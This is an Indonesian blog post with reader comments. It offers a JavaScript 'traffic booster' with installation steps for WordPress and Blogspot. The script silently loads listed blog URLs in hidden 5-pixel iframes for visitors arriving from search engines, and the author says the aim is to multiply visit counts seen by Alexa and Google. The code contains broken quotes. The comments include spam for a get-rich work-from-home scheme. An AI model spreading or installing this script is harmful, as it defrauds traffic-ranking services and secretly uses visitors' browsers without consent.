Traffic Booster Untuk Website Dan Blog

Halo friend ...kali ini saya mau share tentang cara ngeboost traffick website dengan kode javascript..
trik ini sangat berguna sekali buat teman-teman yang punya blog baru dan sekalian ngurusin traffick alexa.
sebelumnya saya jelaskan dulu penjelasan kodenya.

  • var rDomains = ["http://thizan.blogspot.com/","http://thizan45.blogspot.com/"];  adalah  URL yang mau kita Load Silently secara diam2, sebanyak yang kita mau tanpa diketahui oleh Visitor web kita, MAU DIULANG2 JUGA TERSERAH ["http://thizan.blogspot.com/","http://thizan45.blogspot.com/","http://thizan45.blogspot.com/","http://thizan45.blogspot.com/","http://thizan45.blogspot.com/"]; DST sampai ngantuk…hahaha
  • var aDomains = ["http://www.google.com/"];

    Ini adalah Referrer Check. maksudnya, jika kamu mau script ini hanya jalan untuk Visitor dari google.com. tinggal kamu kasi “http://www.google.com/” disana. Kamu juga dapat memakai koma dan membuat list sebanyak yang kamu inginkan misal ["http://www.google.com/","http://www.yahoo.com/","http://www.bing.com/"] Dan Lain2..terserah..
untuk cara kerjanya seperti ini:
-memperbanyak pengunjung rahasia,maksudnya kamu bisa memanfaatkan kunjungan yang minim menjadi banyak di mata alexa dan google dan situs lainnya.
kode ini berfungsi membuat load rahasia di dalam blog sobat,Bingung ya,seperti ini lo: jika pada var rDomains anda kasi 100 link website anda dan anda memiliki pengunjung 20 dr google,5 dari yahoo,10 dri bing..bearti pengunjung kamu sehari adalah 35 ,nah tadi kan pada var rDomains kamu kasi 100,tinggal di kali aja.35 x 100= 3500 pengunjung.bearti kunjungan kamu total sehari menjadi 3500/hari..mantapkan.!
Oke ini dia scriptnya :
<script type="”text/javascript”">
var sLocation = document.referrer.toLocaleLowerCase();
var rDomains = ["http://thizan.blogspot.com/","http://thizan45.blogspot.com/","http://teknologiandsains.blogspot.com/"];
var aDomains = ["http://www.google.com/","http://www.yahoo.com/,"http://www.bing.com/,"http://www.alexa.com/","http://www.blooger.com/","http://www.google.co.id/"];
var valid = 1;
for (i=0;i<aDomains.length;i++) {
if (sLocation.indexOf(aDomains[i], 0) > -1)
{
valid = 1;
break;
}
}
if (valid == 1)
{
for (i=0;i<rDomains.length;i++)
{
//alert(rDomains[i]);
invisibleWindow(“mydiv” + i,rDomains[i]);
}
}
function invisibleWindow(iframeID, url) {
divel = document.createElement(“div”);
divel.id = “div” + iframeID;
divel.style.width = “5px”;
divel.style.height = “5px”;
divel.style.visibility = “hidden”;
document.body.appendChild(divel);
domiframe = document.createElement(“iframe”);
domiframe.id = iframeID;
domiframe.src = url;
domiframe.style.width = “5px”;
domiframe.style.height = “5px”;
domiframe.style.visibility = “hidden”;
var divid = document.getElementById(“div” + iframeID);
divid.appendChild(domiframe);
}
</script>

Untuk Cara Pemasangan sangat gampang koq.
  • pada wordpess : Buka .html or .php file
(wordpress users bisa buka header.php dari editor theme yang kamu pake)

Cari <body> tag.
Setelah itu, paste script tersebut.

  • Pada  blogspot
  1. Add gadget
  2. Add HTML/JavaScript
  3. Paste kan kode di atas pada elemen HTML/javascript.
  4. save
nah itulah cara ngeboost traffick website atau blog saudara.semoga bermanfaat ..
note: jangan di kasi judul pada script kodenya ya.
Sumber :  http://thizan.blogspot.com/2011/04/traffick-booster-untuk-website-blog.html

5 Response to "Traffic Booster Untuk Website Dan Blog"

  1. Numpang promo ya fren.. n_n ini cocok banget buat pelajar dan mahasiswa.. LOWONGAN KERJA SAMPINGAN GAJI 3 JUTA/MINGGU Kerja management dari program kerja online ( Online Based Data Assigment Program / O.D.A.P ) http://www.penasaran.net/?ref=988z8i Membutuhkan 200 karyawan diseluruh Indonesia yang mau kerja sampingan online dengan potensi penghasilan 3 JUTA/Minggu + GAJI POKOK 2 JUTA/Bulan. Tugasnya hanya ENTRY data, per entry @10rb. Misal hari ini anda kirimkan 200 data dari O.D.A.P yang harus di entry berarti kita dapat hari ini @ 10rb x 200 = 2 JUTA. Lebih jelasnya kirimkan NAMA Lengkap & EMAIL anda Buka http://www.penasaran.net/?ref=988z8i (BUKAN MLM) (gunakn akses komputer/laptop utk bukanya)

    bro ini tips masih bisa gk ampe sekarang.

    @yuji
    silahkan.. mantap tuh kayaknya :D

    @adit
    kayaknya gak bisa deh.. soalnya waktu itu aku coba udah g bisa.. :p

    PELANGSING
    Trimakasih informasinya,sangat Bermanfa'at buat kita semua,di tunggu info cantik lainnya...

    PELANGSING
    Trimakasih informasinya,sangat Bermanfa'at buat kita semua,di tunggu info cantik lainnya...

Posting Komentar

kalo suka dengan postingan ini, komentar ya gan!

Related Posts Plugin for WordPress, Blogger...
Powered by Blogger